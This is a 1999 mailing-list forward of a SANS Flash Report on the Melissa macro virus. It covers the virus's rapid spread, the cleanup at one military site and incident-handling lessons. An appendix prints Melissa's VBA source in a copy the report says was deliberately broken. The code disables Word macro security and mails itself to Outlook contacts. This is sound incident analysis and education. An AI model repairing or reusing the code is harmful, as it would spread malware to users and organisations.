IP: EXTRA: SANS Flash Report on the Melissa Virus (fwd)

[Dave Farber <farber () cis upenn edu>]

> Date: Mon, 29 Mar 1999 13:14:36 -0800 (PST)
> From: Michael Dillon <michael () memra com>
> To: farber () cis upenn edu
> Subject: EXTRA: SANS Flash Report on the Melissa Virus (fwd)
> Organization: Memra Communications Inc.
>
>
> This is an excellent summary of the Melissa virus event and shows how
> vulnerable Microsoft's Word and Excel and Access products are even at
> military sites. One point that wasn't made clear by the SANS author was
> that Microsoft has designed Word documents with a built-in virus carrier
> in the form of the AUTOEXEC macro. The same virus carrier is built into
> other Microsoft products and possibly other manufacturers as well. 
>
> Up until now the reaction to these sorts of security incidents has been
> focused almost solely on the identification of a specific attack and
> cleanup after the attack. But no mention is made of fixing the weakness
> that makes these attacks possible by completely separating data and
> programs so that it is not possible for naive users -- the majority of us
> -- to inadvertently run a program when our intention is merely to read a
> data file.
>
> Attacks like the Melissa virus make the news because they are designed to
> wreak havoc in a visible way. But how many more of these viruses are out
> there that are silently collecting data and then removing themselves from
> the system that they infected? This is where the real security problem
> lies and it appears that the US military is vulnerable to such an attack.
>
> --
> Michael Dillon                 -               E-mail: michael () memra com
> Check the website for my Internet World articles -  http://www.memra.com        
>
>
> ---------- Forwarded message ----------
> Date: Mon, 29 Mar 1999 15:33:06 -0500 (EST)
> From: sans () clark net
> To: michael () memra com
> Subject: EXTRA: SANS Flash Report on the Melissa Virus
>
> To:   Michael Dillon SD210249
> From: Rob Kolstad, SANS E-mail Concierge
> Re:   EXTRA: SANS Flash Report on the Melissa Virus
>
> Once or twice a year, the magnitude of a security event is great enough
> to merit a SANS Flash Report.  It is amazing and coincidental that it
> happens in the same 24 hour period that we send out the first SANS
> Newsbites.
>
> NOTE:  SANS will be changing email and web servers this week.  We hope
> to avoid service interruptions, but some error might creep in.  Problems
> to <kolstad () delos com>.
>
> Table of Contents:
>  1.  What Melissa teaches us
>  1.1 Infection Speed
>  1.2 Collateral Damage
>  1.3 Need for Defense in Depth
>  2.  One site's experience in cleaning up after a Melissa infestation
>  3.  Conclusion
>  Appendix: Melissa Source Code
>
> You will already have heard of the Melissa virus, at least from the SANS
> Newsbites, and probably also from newspapers and friends, as well. An
> excellent description of the virus, including how to identify it and
> contain it at the host level, was developed by the Computer Emergency
> Response Team at Carnegie Mellon University.  This document is available
> at:  http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .
>
> The major anti-virus vendors have already released descriptions and
> anti-viral signatures.  URLs for NAI and Symantec are listed below:
> http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
> http://www.symantec.com/avcenter/venc/data/mailissa.html
>
> The rapid response of these organizations has been very impressive, and
> your response should be equally rapid.  If you have not yet taken the
> steps described in the CERT advisory, follow the instructions referenced
> above and get your site's virus signatures updated and the infected
> machines contained and cleaned.  Then read the rest of this document
> that tells some of the lessons learned and also the bigger picture
> surrounding the Melissa Macro virus.  We discuss the implications of
> information gathering viruses like Melissa, the process and impact of
> cleaning up after an outbreak at a military site and finally, share a
> non-working version of the code to help you understand what these viruses
> do.
>
> 1. What Melissa teaches us
>
> 1.1 Infection Speed
>
> According to NAI's web site listed above, the virus was first discovered
> on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
> was first discovered "in the wild" it caused major infections and reports
> from a large number of Department of Defense and Department of Energy
> sites.  Many of you will probably find out today that your site has been
> infected as well.  This serves as a warning how fast a virus with an
> unknown signature can spread.  A modified, non-operative copy of the
> source code is included as an appendix to this document.  If you search
> the listing for the string "For y = 1 To", you can see how the virus
> replicated so rapidly by going through Microsoft Outlook address books
> and sending itself to the first 50 entries in each book.  Sections in
> the code that have been the subject of news reports are marked with
> comments that begin with ***.
>
> Useful Background Information: In the March 2nd SANS First Tuesday
> Intrusion Detection Web Broadcast, archived at
> http://www.sans.org/webarchives.htm, Stephen Northcutt described another
> MS Word Macro Virus, M97.Marker.a.  Marker is an information gathering
> virus which uses FTP to send the Microsoft Office registration information
> of infected systems to outside organizations.  Northcutt described how
> this same technique would allow a prospective attack to develop an
> infection map and by knowing who sends what to whom, to target future
> attacks.
>
> 1.2 Collateral Damage
>
> The Melissa virus apparently does not create any other damage in the
> sense of deleting, or stealing files.  However, when the smoke clears,
> the cost of dealing with Melissa will be measured in the millions of
> dollars.  It also directly affects sites' ability to send and receive
> email.  One network engineer, who worked at one of the first sites to
> report the problem last Friday March 26, said "I knew something was
> wrong before I knew what was wrong.  I could feel the network going
> slower and slower.  As I looked into it, I found the exchange mail
> servers were melting down." One of the lessons of Melissa is that a
> macro virus can hit very fast and very hard.  The engineer went on to
> say, "As I composed the last email of the day, a message hit the Inbox
> of my Microsoft Outlook email application.  The subject line read:
> "Important Message From [Jane Doe]".  I viewed the message, and the body
> read "Here is that document you asked for... don't show anyone else ;-)"
> Attached was a Microsoft Word document titled "list1.doc".
>
> "Although I hadn't requested any documents from [Jane Doe], I was
> expecting a couple of them from other people.  It wasn't inconceivable
> to think that she had become involved, even though I didn't know who
> she was.  I double-clicked on the Word document. A pop-up window appeared,
> warning me that a macro was contained in the document, and that macros
> can potentially be dangerous.  I knew that... :-)  So, I shut down the
> Word application, and checked the document with several of the virus
> detection packages that I had.  Everything appeared clean."
>
> "Since this was from someone in my organization, apparently a trusted
> source, I went ahead and opened the document with the macros enabled.
> In less than a second, a duplicate of the message had hit my mailbox,
> this time with my name attached. I hit the power-off button on my
> computer, but it was late.  The payload had been delivered.  My name
> was now attached to a file containing pornographic web sites, and an
> apparent username and password for each site.  Moments later, duplicate
> messages from others who had made the same mistake began to appear."
>
> "At this point I knew we, as an organization, were in trouble. This
> virus (or worm) was snowballing fast, too fast.  I immediately called
> our information systems security manager, only to find that his phone
> was already busy.  I left a voicemail detailing my appraisal of the
> situation, and my fear that this incident could get serious... very
> quickly.  What I didn't know was that I was too late, it was already
> *very* serious."
>
> 1.3 Need for Defense in Depth
>
> Though Melissa is primarily spread by e-mail, passing an infected floppy
> disk works just as well to move the virus to a new system, possibly even
> a new organization.  If there was ever any doubt about whether we need
> to take virus countermeasures seriously, that time is past.  We recommend
> virus scanning at the firewall, on servers, and on the desktop systems
> as well as physical entry points for magnetic media for sites that want
> to avoid the kind of punch Melissa exhibited.
>
> 2. One site's experience in cleaning up after a Melissa infestation
>
> Here's a first-person description of the process one site used to clean
> up after being hit by Melissa.
>
> "As soon as we discovered the virus late Friday afternoon, we disconnected
> our servers (all SMTP relays and Exchange servers at our Internet
> connection) from the network until we could contain the infection. This
> happened at approximately 1800 hours Friday.
>
> "System administrators for both corporate and departmental Exchange
> servers worked through Friday night and well into Saturday. Many returned
> Saturday and again on Sunday to complete the isolation and cleanup. They
> cleaned up the Exchange servers with updated anti-viral signatures as
> soon as they were available. The corporate servers and one departmental
> server were ready to come back on-line late Sunday. We left IMS (Internet
> Mail Service) disabled until we could contain (filter) email at the SMTP
> server.
>
> "Our version of sendmail is one removed from the latest and filter
> updates provided by the author would not work on our version. We resorted
> to getting the word out for ALL users to update the AV signatures and
> refrain from sending Word docs until any with macros had been identified
> as coming from trusted sources. The administrator for the SMTP relay
> host downloaded a trial version of InterScan VirusWall from TrendMicro.
> For more info, see:  http://www.antivirus.com/products/isvw/index.htm
>
> "The clean-up picture would have been much bleaker if we hadn't had so many
> things in our favor:
> * System administrators were still at work when the problem started
>  (approximately 1640 on Friday).
> * Most of the users were gone for the weekend (and didn't compound the
>  problem by manually sending additional copies of the infected document).
> * All of the system administrators involved in the clean up had been trained
>  in incident handling based on the SANS' Incident Handling Step by Step
>  approach.
> * The person who needed to make key decisions was trained in incident
>  response and had already begun carrying a cell phone.
> * Base commanders recognized the expertise that was in use and supported
>  the Incident Handling team by not directing what needed to be done (at
>  least so far)."
>
> Note: The stages of incident handling are: preparation, identification,
> containment, eradication, and follow-up.  The URLs at the beginning of
> this document can help you with identification and eradication.  Your
> organization may need to consider email server down time in order to
> achieve containment.  You may also want to consider setting up non-email
> communication channels for your organization.  If you do not know how
> to build a telephone call tree, look for a "soccer mom".  They know how
> to spread important information very efficiently.  In this way, if you
> do suffer an email meltdown, you can still get important information,
> such as where to acquire the latest anti-virus software, to your users.
>
> 3. Conclusion
>
> Because Melissa exploits one of the most valuable benefits of the net
> -- the ability to share documents -- to propagate and to multiply itself,
> it will affect far more people far more quickly than earlier viruses.
> The silver lining in this cloud is that a relatively benign virus like
> Melissa is a low-cost way of gaining user awareness.  That same mechanism
> can be used by a more malicious attacker to make private information
> public and to destroy large amounts of important data. It makes sense
> for you to use this opportunity to establish three capabilities if you
> have not already done so:
> (1) user responsibility and active involvement in protecting their
>    systems
> (2) an incident handling capability (Order Incident Handling Step-by-Step
>    from the SANS bookstore www.sans.org if you don't already have a roadmap)
> (3) user awareness of what to look for, whom to call, and what to say
>    when they call about a security threat.
>
> In addition, we at SANS want to hear your experiences and the lessons
> you learned in responding to Melissa. Please send your Melissa-related
> tips, tricks, techniques, experiences and lessons learned to info () sans org
> with Melissa in the subject line.  This type of sharing can help all
> sites be in a better position to respond the next time an event like
> this occurs.
>
> Appendix: Melissa Source Code
>
> NOTE: Several errors have been introduced into this copy of the code as
> a safety measure. It will not run in this form.  We hope the code we
> changed will not overly impact your opportunity to understand how the
> software works, but we could not be responsible for furthering the spread
> of the live version of Melissa.  Text comments have been inserted at
> the "famous" locations preceded by three asterisks "***"
>
> *** Begins by checking security, the environment, and whether already
> infected
>
> Private Sub Document_Open()
>  On Error Resume Next
>  If System.PrivateProfileString("",
>       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
>       "Level") <> "" Then
>    CommandBars("Macro").Controls("Security...").Enabled = False
>    System.PrivateProfileString("",
>       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
>       "Level") = 1&
>  Else
>    CommandBars("Tools").Controls("Macro").Enabled = False
>    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
>    Options.SaveNormalPrompt = (1 - 1)
>  End If
>
> Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
> Set UngaDasOutlook = CreateObject("Outlook.Application")
> Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
> If System.PrivateProfileString("",
>    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
>    "... by Kwyjibo" Then
>  If UngaDasOutlook = "Inlook" Then
>    DasMapName.Logon "profile", "password"
>    For y = 1 To DasMapName.AddressLists.Count
>        Set AddyBook = DasMapiName.AddressLists(y)
>        Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
>        For oo = 1 To AddyBook.AddressEntries.Count
>            Peep = AddyBook.AddressEntries(x)
>            BreakOffASlice.Recipients.Add Peep
>            x++
>            If x < 50 Then oo = AddyBook.AddressEntries.Count
>         Next oo
>         BreakOffASlice.Subject = "Important Message From " &
>              Application.UserName
>         BreakUmOffASlice.Body =
>            "Here is that document you asked for ... don't show anyone else ;-)"
>
> *** Here is the classic subject line "Important Message From" This could
> change of course in future versions ***
>
>         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
>         BreakUmOffASlice.Send
>         Peep = ""
>    Next y
>  DasMapName.Logoff
>  End If
>  System.PrivateProfileString("",
>      "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
>       "... by Kwyjibo"
> End If
> Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
> Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
> NTCL = NTI1.CodeModule.CountOfLines
> ADCL = ADI1.CodeModule.CountOfLines
> BGN = 2
> If ADI1.Name <> "Melissa" Then
>  If ADCL > 0 Then _
>    ADI1.CodeModule.DeleteLines 1, ADCL
>    Set ToInfect = ADI1
>    ADI1.Name = "Melissa"
>    DoAD = True
>  End If
>  If NTI1.Name <> "Melissa" Then
>    If NTCL > 0 Then _
>      NTI1.CodeModule.DeleteLines 1, NTCL
>      Set ToInfect = NTI1
>      NTI1.Name = "Melissa"
>      DoNT = True
>    End If
>    If DoNT <> True And DoAD <> True Then GoTo END
>      If DoNT = True Then
>        Do While ADI1.CodeModule.Lines(1, 1) = ""
>          ADI1.CodeModule.DeleteLines 1
>        Loop
>        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
>        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
>          ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
>          BGN = BGN + 1
>        Loop
>      End If
>      If DoAD = True Then
>        Do While NTI1.CodeModule.Lines(1, 1) = ""
>          NTI1.CodeModule.DeleteLines 1
>        Loop
>        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
>        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
>          ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
>            BGN = BGN + 1
>        Loop
>      End If
> CYA:
>      If NTCL <> 0 And ADCL = 0 And
>          (InStr(1, ActiveDocument.Name, "Document") = False) Then
>        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
>      ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
>        ActiveDocument.Saved = True
>      End If
> 'WORD/Melissa written by Kwyjibo
> 'Works in both Word 2000 and Word 97
> 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
> 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
>
> If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
>    plus triple-word-score, plus fifty points for using all my letters.
>    Game's over.  I'm outta here."
>
> End Sub
>
> *** The lines above are some of the most published information about
> this virus.  Though you can look for the virus with intrusion detection
> and other string matching security tools by searching for keywords like
> "Kwyjibo", simple modifications of the code could change these. ***